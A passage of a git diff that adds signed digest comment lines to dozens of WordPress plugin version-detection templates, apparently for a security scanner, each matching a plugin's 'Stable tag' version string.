b/http/technologies/wordpress/plugins/nextgen-gallery.yaml index dcc61d1255..13083d4634 100644 --- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml +++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a0047304502206ad90e5e96912a018bfe40ac827c9f3b891bf0092b0eafa9c526c8d90ccb5638022100828cf174073a648130314940d19ec39baf080076b7cf64d6f3de3d4d087f51da:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml index d1d2c1c1d0..bdbf1c8a6e 100644 --- a/http/technologies/wordpress/plugins/ninja-forms.yaml +++ b/http/technologies/wordpress/plugins/ninja-forms.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a004730450220204c9734e9c758213e83738059a6f618faeb9602cb70dd23d6d63b8f6d7bbed5022100e379f9d0816f4455576dd88875992bf15ceafefd516abe9b62c4495a8d8ce3a9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml index 59a655c424..29c24cc9c3 100644 --- a/http/technologies/wordpress/plugins/ocean-extra.yaml +++ b/http/technologies/wordpress/plugins/ocean-extra.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100f79c5b150bdffce7217aa2b5dc183a003d5e70443bee7bce0683fe34decbb6830220191983f7d6c5b0fff7e2fe1052eafc104e4495c057d810ef74fe5e4768da0ece:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml index d15634bb2b..4c16ca0547 100644 --- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml +++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100e6224083c3117d90c3f269d7bd6890f4a337e9c7d223ee03814c0c2e59bacad9022100d08fd4ccc342faf318d0c77efd52a1c43e047a2a227b540f737edfb77e91791a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml index 7da04be5d3..5131f9ef5b 100644 --- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml +++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100932e517b31f9b4ec4ffe2666ee9651abfbbd9af66c93356f388ff5004df1b0a502206b48eca6866b19d6fcb70d69cac061d5d9332aa90aafea003032d52603ecb65f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml index a79253cec5..68d95878a0 100644 --- a/http/technologies/wordpress/plugins/optinmonster.yaml +++ b/http/technologies/wordpress/plugins/optinmonster.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100e160ca3bc7f401bbe93d1c6cc6a14ba4c44dc914dfcc71c635320f3dd3c80ef8022100f08de2b1d453d9c897992e5fb03338b338ab2016e79f5754ee8db3f56bdd8c1b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml index 77fc04a220..064a3678bb 100644 --- a/http/technologies/wordpress/plugins/otter-blocks.yaml +++ b/http/technologies/wordpress/plugins/otter-blocks.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a00463044022076e3d2280a8d8a32cd912ccf253e0df561f34bbafb654f1cb69894b752b33cdc02207974b9a5a313181edda2261a501c9faf25e9ceecea3e0886a8de71aa7924da39:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml index 733f9ee453..e27c0eeeec 100644 --- a/http/technologies/wordpress/plugins/password-protected.yaml +++ b/http/technologies/wordpress/plugins/password-protected.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a0047304502206b69420f5056df60145554e3b22012663a8a4b003b2aee8cb27094cf52140b78022100e71c04839625b3aba5f169d9318d81a5933fa316e11637eceecf17aaa2949a78:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml index 0af08f0ac0..f91949c954 100644 --- a/http/technologies/wordpress/plugins/pdf-embedder.yaml +++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100ab1703f9905ec17ba598917691b7e05462acd0861f4255c631bec4b92e864e370220686e6b3581592764e85cd51ee8813845d986cc73cb9df81388c317bb9dece413:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml index 1e4c77fbca..cac7656703 100644 --- a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a0046304402204dd3f114fae3abd7f520bf472a889a078d2c71b5ee462aab2ee87e8b393f4b69022000b5392c7ea36652ae16120fe947f27f64440cefef2f75ea402c79ae2cefde1f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml index 295e3fe82d..59cd007e4c 100644 --- a/http/technologies/wordpress/plugins/pixelyoursite.yaml +++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a0047304502200127412924b7583466606ab50bbb833fc3b5279665fb7c8078c5664bdc49c9ef022100a3df3588f5ca61f83fb65f949a5a87664f3cc76977e10ea7809a910df4de7beb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml index 862f73201f..ad43fa59c5 100644 --- a/http/technologies/wordpress/plugins/polylang.yaml +++ b/http/technologies/wordpress/plugins/polylang.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100836c06ad562d9bf76ce3f9eec4e4c9e3c79ea86cae357bef775c90db3cef44fc022032ae10392fb73131ea10b5e34b806365b28432b85e7dcd42cdf36697e46752b3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml index 711b64f9d0..a06f1c991b 100644 --- a/http/technologies/wordpress/plugins/popup-maker.yaml +++ b/http/technologies/wordpress/plugins/popup-maker.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100c98d775e3cb2e48ef1ef272fb2bd1b3a5c29c4fb0eb0993b64b3913e74cb1254022100f855da1f764a1f05073aaa6157b1b4c24ac4d89b37d4a4f4b4341cacaba384cd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml index 58ddcfab78..9757f4d916 100644 --- a/http/technologies/wordpress/plugins/post-smtp.yaml +++ b/http/technologies/wordpress/plugins/post-smtp.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022013dae9746571061dbfffb2fdd316f1eb64c2da23b4f503415ab6c6c510da9d9f02210092bf1ef94f9e2e865898fa0d8e18117c236327130cdf0d172019dd4c1afc3d94:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml index 305d74e8ea..51c9ea42d3 100644 --- a/http/technologies/wordpress/plugins/post-types-order.yaml +++ b/http/technologies/wordpress/plugins/post-types-order.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100a1d4cf2ebd7896326a5c366678b5043ca1c8dcca8f07315ccfee295c78e580c8022100a1d62e6f76486375aeb1e80f5fd25c8fdd0dbdad274168b65a0fb4714afb4c0d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml index 668162fc4e..0d1ea0e9a9 100644 --- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100fb950f77bfa6039317b195989e11f47126445c3ce592d33db78ba0818530fd2302207d1ad83d643efe1d330da75ed6146fb2db13346eedc902214b26a3d7ed0b4a97:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml index 4f99876557..d74cc6f8bd 100644 --- a/http/technologies/wordpress/plugins/pretty-link.yaml +++ b/http/technologies/wordpress/plugins/pretty-link.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a0046304402204a834a3c1b98611e02f342e25897438906dfa04ea6f98645ddca54b3fcc5dd8302207510000de5f1cbcc46afe2e7bfdf6014ce7336c60945cbe70532dbdbd4c19e4f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml index a0d2554492..5770a17046 100644 --- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml +++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a0048304602210088a7ff318140a7355f3fd4b6aa0b7bafd531ef664fbd8bde1b6785846cc1bc460221009eb47008dcee34727e1cd8433d94999d86952f1ede80055bc3141f395e22476e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml index 97b7306b75..772c4c2edc 100644 --- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml +++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100e94daed852ac4323ed97cfbd6593384c0e4c7be32851a9bdc98da265e5a5c3ac022100a87ec0c9a217333531c562e1007fc97ad5fec04d687656c44a14ed9976c21a58:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml index f44cee7980..85ce175ca7 100644 --- a/http/technologies/wordpress/plugins/redirection.yaml +++ b/http/technologies/wordpress/plugins/redirection.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100e0ce158c90fbf4bf986d2c2d1bd7e815ed51dc5a2b69c2584f14acb21779252d022100dfe3871db0315449a2a649d503ba557379d2e03543ca5c9531bbc153e14840e8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml index 39130db767..9a3f697ed7 100644 --- a/http/technologies/wordpress/plugins/redux-framework.yaml +++ b/http/technologies/wordpress/plugins/redux-framework.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a0047304502202802392779c3fcfaa7d73feb311bd557b6172148260618d92a1e2c04fee1ac9f022100e874769f9a104774a300b0f8871d6719430b123b2b67c2cf8ee7d2900f4ed435:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml index 39c497073c..0bcf6a605e 100644 --- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100d1392eb545d6d5a05c2c9af3dcfd96f2fe7469abbab5d634da9c708c7ea588010220740cb0347c1c61129274e2e758a0610d6647eeed76df26186ae9da6a6adf5fdf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml index b848288b55..7ec544090f 100644 --- a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100bcae90c3c4f5ee9ee4a805eb7a08b2c0191d2b97efe7435e2ef33e5d6e92fae7022100ef15dade4a4a7814b62764bb9b2402c510376607efde5fcedf88dd9878d3dea7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml index 4d10178692..5442ed272b 100644 --- a/http/technologies/wordpress/plugins/safe-svg.yaml +++ b/http/technologies/wordpress/plugins/safe-svg.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a0048304602210093bcf9649adbcc43b30b134ee5cc01fb969ff772578a9e3d92b244764acf77e6022100d8df3b1ef5912abdafd58d98ad6ee0246902a17de9fa6effde07afdb6c5b8f1c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml index 7aac0a153f..89f52eb3bb 100644 --- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml +++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022018a11ef416c0e600e9f4e660bc69b0d35ef9629e0befe3662c0eb599e4164a5d022100ab5c154483fecfefa6b2a58418bb1d5c52ed43c77a622a85dc5d696635ba9ede:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml index d0cebd5316..be02f02a8c 100644 --- a/http/technologies/wordpress/plugins/sg-cachepress.yaml +++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a0047304502210092d11db0abacd7cb1dd9857ddd2e851b829282c928d22c08ce71980de44ed59702201898078cf27ece789dfbfa195da2c2cc16963caac12e6d8df2249825a8db7977:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml index ff20779157..e36e41fb6c 100644 --- a/http/technologies/wordpress/plugins/sg-security.yaml +++ b/http/technologies/wordpress/plugins/sg-security.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a00463044022079dc32f951fb534c0060578a1e33b1646241b99d943232b0ce65a1bd639a935c02202deccfc7c4f502a86819527dd32f916eb64ba7b1ee894065bf499ed0814aedc8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml index fffdc7d017..bb2576b82b 100644 --- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml +++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100dd5a7b6f3551715349eb3026bcc85180463b2c924d42c681d70242d7391e879602206faaab9843a9dd256f42ba00c5b8048a44731eef22f3495f4930e884c8a5ac09:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml index 7a9746a70d..4dbc7f1ee1 100644 --- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml +++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a004730450221009108de4cc3068c6ee9d2e21a5a55decb46bf957d0aa019c8d792be8208725cab022014f884ec0bc032e0eef8d795d892828dc45b97f037405545aa78119ec5a71778:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml index 3fe86debf5..5c3d98b16e 100644 --- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a004730450220048e734f7b1a4b750970555e40016205426753c26c69e4ba155f841f06c5545c022100f02c0d11283d1909f82b5abce8951fe8c4ca08e8b0f7a73c6e7c9ec2d128e08c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/simple-history.yaml b/http/technologies/wordpress/plugins/simple-history.yaml index 18a7437e94..bdcb8abaeb 100644 --- a/http/technologies/wordpress/plugins/simple-history.yaml +++ b/http/technologies/wordpress/plugins/simple-history.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a0047304502210099690e591e2f0209d6011a4d21f1b04301c248df1c9e8ee05d9d9f52abb7f28b02200d57e27599abded0615fde01fe1151e2750c0c5477a7eca43a60b923de322c35:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml index 3deac58709..e3a4ef9d80 100644 --- a/http/technologies/wordpress/plugins/siteguard.yaml +++ b/http/technologies/wordpress/plugins/siteguard.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100dd4d396fdd3770d6ea0369982259b6aa483dbe8aa7f400a277d04acf0906759d0221008b7db25ab7569e095202db3f0617dac01ef8102e2d3bb6669c81086d64675d30:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml index b6f392efba..574bd8da4b 100644 --- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml +++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100920b4a78219b084ff74502785e232759a8a6742df35ba1d13ef19d833189724c02202ea0cd565c62fa85d9df18efcd38c931fadc885822845ae1262d79c3482a012b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml index ad4ebefa4b..dc527ef986 100644 --- a/http/technologies/wordpress/plugins/smart-slider-3.yaml +++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100d0dde6bfc1e30142224e4ed8980363a2ed208a35ab3e899c6e4ff5da5a3487c8022100aac88aba01977da68e156dfd4ba985cc9eb2b38e33e778d4f52faee8acdc6aff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml index 8e88c81c0a..1fb6aa30b0 100644 --- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml +++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100a1b369d64eb792de910472e3dd9cda0e6ccef8e651e5b223b2c7af4cc7e445ec02206fe7b2be22afda20a0e5234cab9d2d871b984e0284cd35d37cb248b18adadf34:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml index 39d269fb85..b9d0613459 100644 --- a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a00463044022077394a1c92c8599eccef4e8345774adc6016e130584a638040907ce4df1af2cb02206d9f3ad1d6f3207cda3fd5c6b6e33a22ee8abfc7a0586ba3b8910f8d17ef4d77:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml index fc126d83c6..f0d4ab8e2e 100644 --- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml +++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100d9930e23699201e4c56e617b5b50a6c7418a84bfbb84770be38c7207aaaefefe02201a8f92ea089724ca8c2af90a69499d6b6a1a64b82e57b025b9e2773ed17d9033:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml index 8c49a34259..e89cbd0654 100644 --- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml +++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a00463044022073e6d2c521c50b9c44e5c1dcc56033332185e683874397b19fd92de9849dbd6502206911820ec20012c35ab35b84f7ea052257b00430d7f6decf0bc37dae9a7a706a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/svg-support.yaml b/http/technologies/wordpress/plugins/svg-support.yaml index c20ed6552a..e52efc37d9 100644 --- a/http/technologies/wordpress/plugins/svg-support.yaml +++ b/http/technologies/wordpress/plugins/svg-support.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a0046304402201e4ecbf3b6fadb7fe9c79bfe4f75e18503fe7215fec087d686cb38c39220be9d02207807db11248844df957e427bf85e62221809ff41614ef301a08a7fb589a2c2bf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml index 71c71b5ed1..314a530a78 100644 --- a/http/technologies/wordpress/plugins/tablepress.yaml +++ b/http/technologies/wordpress/plugins/tablepress.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100c569f9573e97adaaf0185170f96e4383900d8870f82d8bb15c94ec9740c260020221009ad10fcb12f99345d8e3f4104d7b4d4e6a97cfb4d71bbab4c62c7b1e9293d7d5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml index 7b47adc274..a92e0f8e76 100644 --- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml +++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a004730450220777f0f2b44385235e92d82dd610538966e73850b9751e16dc11ff68134eebb0d022100802b37adf210b41e232f67159c734845b4a0a9ae1019fe57d0bfb04ef1446d96:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/templately.yaml b/http/technologies/wordpress/plugins/templately.yaml index 286dfdaec6..068e925ec0 100644 --- a/http/technologies/wordpress/plugins/templately.yaml +++ b/http/technologies/wordpress/plugins/templately.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100baa0fbd768a3c6e7fe0c908a744833f6c9c9935e7f42da9dfed212be5832dcda022009b02b66429825febd35642ff067262d319dfbf46d7d22f5ab665d8fc7058a81:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml index c4928059f6..698168e580 100644 --- a/http/technologies/wordpress/plugins/the-events-calendar.yaml +++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a004830460221008177f5cfd0114401b4b8e168be1ef68101713bcc6e6410f35a34b980421a3648022100bdbb0ecd24c03155c2a9096141c28c98fac9e8502a89d58fe8be155c5b94fdc0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml index f6a7836f35..acb0b5bd75 100644 --- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml +++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a00463044022033dfa167b78dfdb587db1856ec232aaa4d6dbfa188cf78d3bcc8123013f565ca022047327f7189f462c2e1d285f1ec98141a808981d5fd4e19401a7c94fccc032e36:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml index b7af708c4f..85ca1a53f7 100644 --- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml +++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100bb791da54617603c2a86d8fbbbc6186265b00cb3cf9aaddbe4368dc46f6b415602206f85d4a9ecbd6d2eb4243d876f458d36a2c6eab2e62f73b16418069df8b71637:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml index 61a793edf7..25ba704ceb 100644 --- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100c3f37dea866a6cb9fa6df1b765f5b3d9ed71fc43330d1149efe86a47d6c95a48022100810660fbc204d2c1c1cb8ca21bd2fe4a1cc0a580757bce501912351553b0e570:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml index 0da88d5d3f..ca8f77ec25 100644 --- a/http/technologies/wordpress/plugins/under-construction-page.yaml +++ b/http/technologies/wordpress/plugins/under-construction-page.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 